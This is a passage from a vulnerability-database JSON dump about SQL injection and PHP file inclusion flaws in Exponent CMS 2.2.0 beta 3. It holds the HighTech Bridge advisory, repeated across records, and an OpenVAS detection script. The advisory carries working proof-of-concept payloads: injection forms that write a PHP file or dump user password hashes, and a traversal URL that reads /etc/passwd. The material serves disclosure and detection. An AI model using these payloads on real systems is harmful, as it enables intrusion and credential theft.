FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2) PHP File Inclusion in Exponent CMS: CVE-2013-3295\r\n\r\nThe vulnerability is caused by improper filtration of user-supplied input passed via the "page" HTTP GET parameter to "/install/popup.php" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. \r\n\r\nThe PoC code below will output the content of '/etc/passwd' file on vulnerable system:\r\n\r\nhttp://[host]/install/popup.php?page=../../../../etc/passwd%00\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Exponent CMS v2.2.0 Release Candidate 1\r\n\r\nMore Information:\r\nhttp://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose\r\nhttp://forums.exponentcms.org/viewtopic.php?f=16&t=789\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23154 - https://www.htbridge.com/advisory/HTB23154 - Multiple Vulnerabilities in Exponent CMS.\r\n[2] Exponent CMS - http://www.exponentcms.org - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:DOC:29587", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29587", "title": "Multiple Vulnerabilities in Exponent CMS", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "cvelist": ["CVE-2013-4621", "CVE-2013-3635", "CVE-2013-3639", "CVE-2013-3514", "CVE-2013-3729", "CVE-2012-6458", "CVE-2013-3551", "CVE-2013-3294", "CVE-2013-3728", "CVE-2013-3295", "CVE-2013-3637", "CVE-2013-2624", "CVE-2013-4088", "CVE-2013-3515", "CVE-2013-3727", "CVE-2013-3636", "CVE-2013-1777", "CVE-2013-2621", "CVE-2013-3739", "CVE-2013-2623", "CVE-2013-3638"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:VULN:13172", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13172", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-05-12T17:27:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-3294", "CVE-2013-3295"], "description": "This host is installed with Exponent CMS and is prone to multiple\n vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2013-05-23T00:00:00", "id": "OPENVAS:1361412562310803702", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803702", "type": "openvas", "title": "Exponent CMS Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Exponent CMS Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:exponentcms:exponent_cms\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803702\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2013-3294\", \"CVE-2013-3295\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-05-23 14:56:02 +0530 (Thu, 23 May 2013)\");\n script_name(\"Exponent CMS Multiple Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_exponet_cms_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"ExponentCMS/installed\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/May/57\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/121643\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23154\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/526609\");\n script_xref(name:\"URL\", value:\"http://forums.exponentcms.org/viewtopic.php?f=16&t=789\");\n script_xref(name:\"URL\", value:\"http://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary SQL\n commands or include arbitrary PHP files from the local system using directory\n traversal sequences with URL-encoded NULL byte, read arbitrary files or execute\n arbitrary PHP code on the target system.\");\n\n script_tag(name:\"affected\", value:\"Exponent CMS version 2.2.0 beta 3 and prior\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to,\n\n - Insufficient filtration of 'src' and 'username' HTTP GET parameters passed\n to '/index.php' script. A remote unauthenticated attacker can execute\n arbitrary SQL commands in application's database.\n\n - Improper filtration of user-supplied input passed via the 'page' HTTP GET\n parameter to '/install/popup.php' script.\");\n\n script_tag(name:\"solution\", value:\"Update to Exponent CMS 2.2.0 Release Candidate 1 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Exponent CMS and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nif( dir == \"/\" ) dir = \"\";\n\nfiles = traversal_files();\n\nforeach file( keys( files ) ) {\n\n url = dir + \"/install/popup.php?page=\" + crap( data:\"../\", length:3*15 ) + files[file] + \"%00\";\n\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T01:33:13", "description": "Exponent CMS 2.2.0 beta 3 - Multiple Vulnerabilities. CVE-2013-3294. Webapps exploit for php platform", "published": "2013-05-17T00:00:00", "type": "exploitdb", "title": "Exponent CMS 2.2.0 beta 3 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3294"], "modified": "2013-05-17T00:00:00", "id": "EDB-ID:25518", "href": "https://www.exploit-db.com/exploits/25518/", "sourceData": "Advisory ID: HTB23154\r\nProduct: Exponent CMS\r\nVendor: Online Innovative Creations\r\nVulnerable Version(s): 2.2.0 beta 3 and probably prior\r\nTested Version: 2.2.0 beta 3\r\nVendor Notification: April 24, 2013 \r\nVendor Patch: May 3, 2013 \r\nPublic Disclosure: May 15, 2013 \r\nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]\r\nCVE References: CVE-2013-3294, CVE-2013-3295\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system.\r\n\r\n\r\n1) SQL Injection in Exponent CMS: CVE-2013-3294\r\n\r\nThe vulnerability exists due to insufficient filtration of \"src\" and \"username\" HTTP GET parameters passed to \"/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nDepending on database and system configuration, the PoC (Proof-of-Concept) code below will create a \"/var/www/file.php\" file with PHP function 'phpinfo()':\r\n\r\n\r\n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"action\" value=\"login\">\r\n<input type=\"hidden\" name=\"int\" value=\"1\">\r\n<input type=\"hidden\" name=\"module\" value=\"login\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \">\r\n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\nThe second PoC will attempt to create \"/var/www/file.txt\" file, containing usernames and hashed passwords of all application's users: \r\n\r\n\r\n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"action\" value=\"login\">\r\n<input type=\"hidden\" name=\"int\" value=\"1\">\r\n<input type=\"hidden\" name=\"module\" value=\"login\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \">\r\n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n\r\n2) PHP File Inclusion in Exponent CMS: CVE-2013-3295\r\n\r\nThe vulnerability is caused by improper filtration of user-supplied input passed via the \"page\" HTTP GET parameter to \"/install/popup.php\" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. \r\n\r\nThe PoC code below will output the content of '/etc/passwd' file on vulnerable system:\r\n\r\nhttp://[host]/install/popup.php?page=../../../../etc/passwd%00\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Exponent CMS v2.2.0 Release Candidate 1\r\n\r\nMore Information:\r\nhttp://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose\r\nhttp://forums.exponentcms.org/viewtopic.php?f=16&t=789\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23154 - https://www.htbridge.com/advisory/HTB23154 - Multiple Vulnerabilities in Exponent CMS.\r\n[2] Exponent CMS - http://www.exponentcms.org - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u017d is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25518/"}]}
